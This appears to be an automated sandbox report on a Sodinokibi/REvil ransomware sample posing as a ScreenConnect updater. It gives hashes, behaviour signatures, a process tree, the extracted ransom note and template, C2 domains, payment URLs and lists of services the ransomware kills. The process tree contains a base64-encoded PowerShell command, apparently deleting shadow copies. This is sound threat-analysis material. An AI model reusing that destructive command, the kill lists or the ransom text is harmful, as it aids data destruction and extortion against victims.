Analysis

  • max time kernel
    196s
  • max time network
    239s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    21-07-2021 07:46

General

  • Target

    Device/HarddiskVolume2/Windows/Temp/ScreenConnect/20.1.27036.7360/updater.exe

  • Size

    304KB

  • MD5

    a8c4e617b6844adac7cf660206eb2b04

  • SHA1

    18dd1abc064d994ac14f7ffccdb56f0df627e82b

  • SHA256

    6671809c7cf4981d0ef027241b33ba9620ca52422a944129891366fc46758d46

  • SHA512

    18c7d222b446588d31ca5d38779895691c33a9fc16acb4d8b8ba108098fec9cbe1808e0526256ae73e31c68aff44e52695d73d6e14975b6e7f8812b175011800

Malware Config

Extracted

Path

C:\6oe2u3mw6-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 6oe2u3mw6. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). The faster you contact us, the easier it will be for us to agree. Your backups were also encrypted and removed. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/80111FF3C49D734C 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/80111FF3C49D734C Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: CZuLX5yLpAipf9uu0eazaTRj7BWawVpJldKJ81HnkJbVfnnH5dKg5+em/LNfYo1R ead9ugR2Dk26ACRBuX+yVPXp6uca8JZEB2vmkg11F6YvSs+2CaWPtYaz8xFMVlrU z92BlJW7PrPOSo62hOo7VKalbHhI3qSVW2ZnBliT8do1QFNjUBZvNInzqYxQEipM Vvr1iT1YYE+oNgDuN9xmSBZs8TfJ065ciOlHAXQrBIU6aFVJuCjboO4uxnCUgjIV zSnmzHcodleTU+EKBb6hVv5rHFXvtlJVE9H6mEFUly9aojY1ej7QQaEGV6XDTpCp 8U2/xAS/1ayOY+gSRB8MFya2c637yP8BfdJjgLKTlnad+wmsQevkvzrfBIRebNHy iSfT6qFPQODV3dkCg9NehDwTTLHVB0SqAMYruK30Yo5jEk1ecKErYCbQ6CLeOUsx 80HGITD7Q0w2yNgtZMpDZR3jXjTcA3yLONK4kmc8Sd3GbYrqTQu/l5jVLJYf1reI gDmlaNzhYdLgxwSzfJvR8jMsOf+EkSKkHgKBrFWWuwt7+pPwdNnvVLHimJ8E+5Or xID5cMIefXbkjPQ6ZfxBv8Qu8+o2c/J1pHmT9JV9S+8TwQkjNKGgqJ1QkuAM3FNx 6iDIIz/36jUS2JQg5cv1EYX0ALi8LayFnYuE38SynZ5GqGBGm3Sf7lwyzZom+byB oTczBr1nEsEOYsn2bFeIyonNDGMJ2wt3tw5JgQUs97EkAuvsNzLhxqUyHeRkvo2K LnZ34YKNBUNCyW5uk2WaI9XMbifdcAa5OGJcDdPWGgXPP+SKi8XCsqJBCR2Z4qfK uKypTPTH05RDs0DRKRnQcq1QM3P7shlNdjibstdrC0AQXqyMhwZmpuBm0c9TscG5 2vxnLU6Y6//u2NtkoCqphrHOkQOyU0XSPewiFaQGKHwcz3GRji/QEUaD/zK/6O+N w6iR2AQ4qI+pgJm01+JUT/Utp7B3SGPSMri9Zt8dwgr0CEcXOjHPTp84MwTRFLG+ NMFk7vPlL65vVoXTozyx0cJbQS/+nao5p57A65V/poKFLtB9vKfFaPVmxgKcLwyo 9KODOOCTFljdJ4f/2JcNd+rIkDeSmt8eBPrMd8JV1fIFxcSeNj3ZRYk3z0pNMInM j/16E2cUZb1d12lMqNBg8GRMNaQLwf8kKxtIWFNreuC3d0TMr3swNG1WTIuFaQqX AcxQ5UzIwPCXIupYGcDniIvgu9BxlThPYqj8OOKxoUuB+OxCOC3QolMgWLENpdhj AXlMVP62mnNq8A1kcn5v7rqLeAgeow== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! ----------------------------------------------------------------------------------------- You can read about us on Google: Revil/Sodinokibi - Travelex, CyrusOne, Synoptek, etc.
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/80111FF3C49D734C

http://decryptor.cc/80111FF3C49D734C

Extracted

Family

sodinokibi

Botnet

$2a$10$zvCaHrcgOsssnXucoJXYJuoAPynYmqwEN1ZMWc0pxExPCnGaUXX8C

Campaign

4953

C2

lucidinvestbank.com

villa-marrakesch.de

pomodori-pizzeria.de

seevilla-dr-sturm.at

naturavetal.hr

rumahminangberdaya.com

kaliber.co.jp

campus2day.de

newstap.com.ng

liikelataamo.fi

easytrans.com.au

baylegacy.com

blgr.be

denovofoodsgroup.com

jobcenterkenya.com

lachofikschiet.nl

tinkoff-mobayl.ru

nandistribution.nl

bildungsunderlebnis.haus

better.town

Attributes
  • net

    false

  • pid

    $2a$10$zvCaHrcgOsssnXucoJXYJuoAPynYmqwEN1ZMWc0pxExPCnGaUXX8C

  • prc

    cvfwd

    visio

    ocssd

    sapstartsrv

    vxmon

    avscc

    bengien

    infopath

    thebat

    disk+work

    CagService

    excel

    ocautoupds

    mydesktopqos

    TeamViewer.exe

    xfssvccon

    DellSystemDetect

    powerpnt

    isqlplussvc

    cvd

    tv_w32.exe

    sql

    TeamViewer_Service.exe

    tv_x64.exe

    mspub

    pvlsvr

    winword

    thunderbird

    EnterpriseClient

    saphostexec

  • ransom_oneliner

    All of your files are encrypted! Find {EXT}-readme.txt and follow instuctions

  • ransom_template

    ---=== Welcome ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension {EXT}. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). The faster you contact us, the easier it will be for us to agree. Your backups were also encrypted and removed. [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/{UID} 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/{UID} Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: {KEY} ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!! ----------------------------------------------------------------------------------------- You can read about us on Google: Revil/Sodinokibi - Travelex, CyrusOne, Synoptek, etc.

  • sub

    4953

  • svc

    VSNAPVSS

    WSBExchange

    BackupExecManagementService

    SAPD$

    GxVssHWProv

    memtas

    GxClMgrS

    SAPService

    CAARCUpdateSvc

    MSExchange$

    MSExchange

    MSSQL$

    MSSQL

    MVArmor

    bedbg

    CASAD2DWebSvc

    BackupExecAgentBrowser

    VeeamNFSSvc

    SAPHostExec

    AcrSch2Svc

    QBIDPService

    GXMMM

    QBDBMgrN

    GxFWD

    AcronisAgent

    QBCFMonitorService

    BackupExecRPCService

    avbackup

    mepocs

    backup

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Loads dropped DLL 1 IoCs
  • Enumerates connected drives 3 TTPs 25 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Device\HarddiskVolume2\Windows\Temp\ScreenConnect\20.1.27036.7360\updater.exe
    "C:\Users\Admin\AppData\Local\Temp\Device\HarddiskVolume2\Windows\Temp\ScreenConnect\20.1.27036.7360\updater.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of SetThreadContext
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of WriteProcessMemory
    PID:4796
    • C:\Users\Admin\AppData\Local\Temp\Device\HarddiskVolume2\Windows\Temp\ScreenConnect\20.1.27036.7360\updater.exe
      "C:\Users\Admin\AppData\Local\Temp\Device\HarddiskVolume2\Windows\Temp\ScreenConnect\20.1.27036.7360\updater.exe"
      2⤵
      • Modifies extensions of user files
      • Enumerates connected drives
      • Sets desktop wallpaper using registry
      • Drops file in Program Files directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4176
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:364
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
      PID:640
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2292

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • \Users\Admin\AppData\Local\Temp\nsv6D38.tmp\System.dll
      MD5

      0063d48afe5a0cdc02833145667b6641

      SHA1

      e7eb614805d183ecb1127c62decb1a6be1b4f7a8

      SHA256

      ac9dfe3b35ea4b8932536ed7406c29a432976b685cc5322f94ef93df920fede7

      SHA512

      71cbbcaeb345e09306e368717ea0503fe8df485be2e95200febc61bcd8ba74fb4211cd263c232f148c0123f6c6f2e3fd4ea20bdecc4070f5208c35c6920240f0

    • memory/364-117-0x0000000000000000-mapping.dmp
    • memory/364-123-0x000001FA42B20000-0x000001FA42B21000-memory.dmp
      Filesize

      4KB

    • memory/364-127-0x000001FA44EB0000-0x000001FA44EB1000-memory.dmp
      Filesize

      4KB

    • memory/364-133-0x000001FA42BD3000-0x000001FA42BD5000-memory.dmp
      Filesize

      8KB

    • memory/364-132-0x000001FA42BD0000-0x000001FA42BD2000-memory.dmp
      Filesize

      8KB

    • memory/364-139-0x000001FA42BD6000-0x000001FA42BD8000-memory.dmp
      Filesize

      8KB

    • memory/4176-115-0x0000000000403ED1-mapping.dmp
    • memory/4176-116-0x0000000000400000-0x0000000000421000-memory.dmp
      Filesize

      132KB